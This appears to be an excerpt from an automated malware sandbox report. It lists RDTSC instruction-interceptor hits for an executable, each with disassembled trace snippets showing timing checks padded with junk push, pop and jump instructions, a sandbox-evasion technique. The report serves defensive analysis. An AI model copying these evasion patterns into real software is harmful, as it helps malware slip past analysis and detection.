Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C07DC second address: 53C07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C07E2 second address: 53C07E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C07E6 second address: 53C0858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1CC8BB7C3Ah 0x00000010 jmp 00007F1CC8BB7C45h 0x00000015 popfd 0x00000016 mov dx, cx 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d jmp 00007F1CC8BB7C3Ah 0x00000022 mov ebp, esp 0x00000024 jmp 00007F1CC8BB7C40h 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1CC8BB7C3Eh 0x00000031 adc ah, 00000048h 0x00000034 jmp 00007F1CC8BB7C3Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0858 second address: 53C085C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E0589 second address: 53E058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E058D second address: 53E0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E0593 second address: 53E05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov ecx, 77A14E29h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E05B9 second address: 53E05BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E05BD second address: 53E05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E05C3 second address: 53E05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 540079B second address: 54007A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007A1 second address: 54007A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007A5 second address: 54007B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007B4 second address: 54007B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007B8 second address: 54007D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007D1 second address: 54007E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54007E1 second address: 540080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F1CC8BB7C47h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov bl, ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 540080A second address: 5400871 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F1CC8B8C9F9h 0x0000000e and eax, 2F362126h 0x00000014 jmp 00007F1CC8B8C9F1h 0x00000019 popfd 0x0000001a movzx esi, dx 0x0000001d popad 0x0000001e popad 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 40F2A2C8h 0x00000028 pushfd 0x00000029 jmp 00007F1CC8B8C9F1h 0x0000002e jmp 00007F1CC8B8C9EBh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400871 second address: 540089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [76FB65FCh] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 540089E second address: 54008A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54008A4 second address: 54008F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 pushfd 0x00000012 jmp 00007F1CC8BB7C46h 0x00000017 xor ecx, 4808CC48h 0x0000001d jmp 00007F1CC8BB7C3Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54008F2 second address: 5400941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1D3A6BFA3Dh 0x0000000f jmp 00007F1CC8B8C9EEh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov edx, 32F7A3F0h 0x0000001c popad 0x0000001d xor eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1CC8B8C9EEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400941 second address: 5400950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400950 second address: 5400A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007F1CC8B8C9EEh 0x00000011 ror eax, cl 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9EEh 0x0000001a jmp 00007F1CC8B8C9F5h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F1CC8B8C9F0h 0x00000026 adc esi, 5129BB58h 0x0000002c jmp 00007F1CC8B8C9EBh 0x00000031 popfd 0x00000032 popad 0x00000033 leave 0x00000034 jmp 00007F1CC8B8C9F6h 0x00000039 retn 0004h 0x0000003c nop 0x0000003d mov esi, eax 0x0000003f lea eax, dword ptr [ebp-08h] 0x00000042 xor esi, dword ptr [00A62014h] 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e push eax 0x0000004f call 00007F1CCD56D3FAh 0x00000054 push FFFFFFFEh 0x00000056 pushad 0x00000057 mov esi, ebx 0x00000059 popad 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F1CC8B8C9F1h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400A00 second address: 5400A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400A04 second address: 5400A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400A0A second address: 5400A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F1CCD59867Ah 0x00000011 mov edi, edi 0x00000013 pushad 0x00000014 call 00007F1CC8BB7C3Eh 0x00000019 jmp 00007F1CC8BB7C42h 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F1CC8BB7C3Bh 0x00000025 adc cl, 0000003Eh 0x00000028 jmp 00007F1CC8BB7C49h 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F1CC8BB7C3Eh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400A7E second address: 5400A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400A83 second address: 5400AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C44h 0x00000009 sbb esi, 2D284998h 0x0000000f jmp 00007F1CC8BB7C3Bh 0x00000014 popfd 0x00000015 call 00007F1CC8BB7C48h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov di, 30C2h 0x00000024 call 00007F1CC8BB7C43h 0x00000029 movzx eax, bx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400AEF second address: 5400AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400AF3 second address: 5400B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400B10 second address: 5400B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1CC8B8C9F7h 0x00000014 mov ecx, 400E5ACFh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 5400B3C second address: 5400B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B002A second address: 53B0030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0030 second address: 53B00AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C45h 0x00000009 sub cx, EFB6h 0x0000000e jmp 00007F1CC8BB7C41h 0x00000013 popfd 0x00000014 mov ax, 39A7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1CC8BB7C3Fh 0x00000025 add cx, 9CEEh 0x0000002a jmp 00007F1CC8BB7C49h 0x0000002f popfd 0x00000030 jmp 00007F1CC8BB7C40h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B00AB second address: 53B00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F1h 0x00000009 xor si, 33D6h 0x0000000e jmp 00007F1CC8B8C9F1h 0x00000013 popfd 0x00000014 mov ax, A347h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1CC8B8C9F4h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B00F8 second address: 53B00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B00FC second address: 53B0102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0102 second address: 53B0125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CC8BB7C3Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0125 second address: 53B012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B012B second address: 53B0144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0148 second address: 53B0165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0165 second address: 53B018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e movsx edx, ax 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B018A second address: 53B018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B018E second address: 53B0194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0194 second address: 53B019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B019A second address: 53B019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B019E second address: 53B01A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B01A2 second address: 53B01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007F1CC8B8C9F5h 0x00000015 adc eax, 592866C6h 0x0000001b jmp 00007F1CC8B8C9F1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B01E0 second address: 53B01F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8B02h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov di, C214h 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B01F7 second address: 53B0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0210 second address: 53B0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 5EA39155h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0223 second address: 53B0228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0228 second address: 53B0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 09C2h 0x00000007 movsx edx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007F1CC8BB7C42h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1CC8BB7C47h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0264 second address: 53B0290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cl, bh 0x0000000d mov si, B0DFh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0290 second address: 53B0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0296 second address: 53B029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B029B second address: 53B02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B02A1 second address: 53B02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9EDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B02BB second address: 53B0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 7E3Eh 0x00000011 pushfd 0x00000012 jmp 00007F1CC8BB7C3Fh 0x00000017 sbb cl, FFFFFFEEh 0x0000001a jmp 00007F1CC8BB7C49h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0306 second address: 53B030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B030C second address: 53B0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0310 second address: 53B032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B032D second address: 53B0331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0331 second address: 53B0337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0337 second address: 53B0350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0350 second address: 53B0354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0354 second address: 53B035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B035A second address: 53B0360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0360 second address: 53B03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C48h 0x00000011 or ax, 4258h 0x00000016 jmp 00007F1CC8BB7C3Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F1CC8BB7C48h 0x00000022 jmp 00007F1CC8BB7C45h 0x00000027 popfd 0x00000028 popad 0x00000029 je 00007F1D3A735E86h 0x0000002f jmp 00007F1CC8BB7C3Eh 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b pushad 0x0000003c mov edi, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 movzx eax, bx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B03E8 second address: 53B0418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F1D3A70AC22h 0x0000000d jmp 00007F1CC8B8C9F1h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1CC8B8C9EDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0418 second address: 53B0428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53B0428 second address: 53B0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
